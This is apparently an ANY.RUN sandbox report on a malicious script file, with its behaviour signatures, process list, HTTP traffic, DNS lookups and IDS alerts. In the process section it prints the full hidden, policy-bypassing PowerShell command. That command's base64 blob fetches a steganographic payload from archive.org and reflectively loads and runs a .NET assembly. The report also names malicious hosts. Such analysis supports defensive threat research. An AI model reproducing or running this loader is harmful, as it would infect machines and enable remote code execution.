File name:

_9e723c8e69f2f47abffed153064f415caf47528ed269b56725c0cd26326a2f32.txt

Full analysis: https://app.any.run/tasks/26e49ba0-ea4a-459f-b964-9050026337cd
Verdict: Malicious activity
Analysis date: August 14, 2025, 15:16:30
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
susp-powershell
payload
Indicators:
MIME: text/plain
File info: Unicode text, UTF-8 text, with very long lines (1350), with CRLF line terminators
MD5:

73EC60B26018346B613F2296EFD0E239

SHA1:

D094DFE8BD5E7840B7FF9D6943D42A356B3ADA1B

SHA256:

9E723C8E69F2F47ABFFED153064F415CAF47528ED269B56725C0CD26326A2F32

SSDEEP:

768:e0+C50EULYyskCd+I4Jv5Y+eBjTrPg1+6pagSk+9jnsVi1d3Yeg+Jp1re4JaSk+X:e0+C50EULYyskCd+I4Jv5Y+eBjTrPg1U

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • May hide the program window using WMI (SCRIPT)

      • wscript.exe (PID: 2964)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6820)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6820)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 6820)

  • SUSPICIOUS

    • Creates an object to access WMI (SCRIPT)

      • wscript.exe (PID: 2964)

    • Uses WMI to retrieve WMI-managed resources (SCRIPT)

      • wscript.exe (PID: 2964)

    • Executed via WMI

      • powershell.exe (PID: 6820)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6820)

  • INFO

    • Disables trace logs

      • powershell.exe (PID: 6820)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 6820)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 6820)

    • Checks proxy server information

      • powershell.exe (PID: 6820)
      • slui.exe (PID: 6840)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6820)

    • Found Base64 encoded network access via PowerShell (YARA)

      • powershell.exe (PID: 6820)

    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • powershell.exe (PID: 6820)

    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • powershell.exe (PID: 6820)

    • Reads the software policy settings

      • slui.exe (PID: 6840)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
136
Monitored processes
4
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe conhost.exe no specs slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
2964"C:\Windows\System32\WScript.exe" C:\Users\admin\Desktop\_9e723c8e69f2f47abffed153064f415caf47528ed269b56725c0cd26326a2f32.txt.jsC:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2972\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6820powershell -w hidden -noprofile -ep bypass -c "$annointing='JG51bGwgPSAoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0U3RyaW5nKChJbnZva2UtV2ViUmVxdWVzdCAnaHR0cHM6Ly9hcmNoaXZlLm9yZy9kb3dubG9hZC9tc2ktcHJvL01TSV9QUk8uanBnJyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50KSAtbWF0Y2ggJ0Jhc2VTdGFydC0oLio/KS1CYXNlRW5kJyk7JHZhbG9yID0gJG1hdGNoZXNbMV07JGFzc2VtYmx5ID0gW1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdmFsb3IpKTskb2xpbmlhID0gJzBoSGR1QXpOM016TmlOR00yZ1RZbWRqTjNrVE95VUdObEJUWWlSbU16a0RNeEUyWWY5bWRwVlhjeUYyTGpSbkwwZG1MeEl6YnVsMlloMTJMdm9EYzBSSGEnLlJlcGxhY2UoJ159JywndCcpOyR0eXBlID0gJGFzc2VtYmx5LkdldFR5cGUoJ0NsYXNzTGlicmFyeTEuSG9tZScpOyRtZXRob2QgPSAkdHlwZS5HZXRNZXRob2QoJ1ZBSScpOyRtZXRob2QuSW52b2tlKCRudWxsLCBbb2JqZWN0W11dQCgkb2xpbmlhLCcnLCcnLCcnLCdNU0J1aWxkJywnJywnJywnJywnJywnQzpcVXNlcnNcUHVibGljXERvd25sb2FkcycsJ3RocmlwcycsJ2pzJywnJywnJywnY29sbG9kaXVtJywnMicsJycpKTs=';$translatively=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($annointing));Invoke-Expression $translatively"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6840C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
Total events
8 546
Read events
8 545
Write events
1
Delete events
0

Modification events

(PID) Process:(2964) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
Operation:writeName:JScriptSetScriptStateStarted
Value:
FCD7180000000000
Executable files
0
Suspicious files
1
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
6820powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_dk1xszvd.caq.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6820powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_szqc5iav.clh.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6820powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:1390FF9EDDD15A4271D0B917CFE9C51D
SHA256:E781798CD9695BABC51958B9DCBB1102EB6032D171DDA27729015DF07326B84C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
12
TCP/UDP connections
25
DNS requests
11
Threats
12

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5944
MoUsoCoreWorker.exe
GET
200
23.216.77.16:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
DE
binary
825 b
whitelisted
1268
svchost.exe
GET
200
23.216.77.16:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
DE
binary
825 b
whitelisted
5968
RUXIMICS.exe
GET
200
23.216.77.16:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
DE
binary
825 b
whitelisted
1268
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
NL
binary
814 b
whitelisted
GET
200
51.77.231.201:443
https://suspended-domain.net/a/index.html
FR
html
56.7 Kb
unknown
6820
powershell.exe
GET
302
185.27.134.212:80
http://macino21.gt.tc/arquivo_ca10932dba0e4e299767fa860cb73770.txt
GB
html
242 b
malicious
GET
302
207.241.224.2:443
https://archive.org/download/msi-pro/MSI_PRO.jpg
US
unknown
5968
RUXIMICS.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
NL
binary
814 b
whitelisted
GET
200
204.62.247.40:443
https://dn721700.ca.archive.org/0/items/msi-pro/MSI_PRO.jpg
US
binary
7.69 Mb
whitelisted
POST
500
4.255.142.105:443
https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
US
xml
512 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1268
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
5944
MoUsoCoreWorker.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5968
RUXIMICS.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
1268
svchost.exe
23.216.77.16:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5944
MoUsoCoreWorker.exe
23.216.77.16:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5968
RUXIMICS.exe
23.216.77.16:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
1268
svchost.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
5968
RUXIMICS.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 51.104.136.2
whitelisted
google.com
  • 142.250.185.78
whitelisted
crl.microsoft.com
  • 23.216.77.16
  • 23.216.77.25
  • 23.216.77.15
  • 23.216.77.18
  • 23.216.77.20
  • 23.216.77.22
  • 23.216.77.21
  • 23.216.77.19
  • 23.216.77.13
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
archive.org
  • 207.241.224.2
whitelisted
dn721700.ca.archive.org
  • 204.62.247.40
whitelisted
macino21.gt.tc
  • 185.27.134.212
unknown
suspended-domain.net
  • 51.77.231.201
unknown
self.events.data.microsoft.com
  • 104.208.16.88
whitelisted
activation-v2.sls.microsoft.com
  • 4.255.142.105
whitelisted

Threats

PID
Process
Class
Message
Unknown Traffic
ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
A Network Trojan was detected
ET MALWARE Request To Image Hosted on Archive .org With PowerShell User-Agent (Likely Stenography Payload)
A Network Trojan was detected
ET MALWARE Request To Image Hosted on Archive .org With PowerShell User-Agent (Likely Stenography Payload)
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
A Network Trojan was detected
ET MALWARE Request To Image Hosted on Archive .org With PowerShell User-Agent (Likely Stenography Payload)
A Network Trojan was detected
PAYLOAD [ANY.RUN] Base64 encoded PE EXE file inside JPEG image
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
A Network Trojan was detected
ET MALWARE Request To Image Hosted on Archive .org With PowerShell User-Agent (Likely Stenography Payload)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
_9e723c8e69f2f47abffed153064f415caf47528ed269b56725c0cd26326a2f32.txt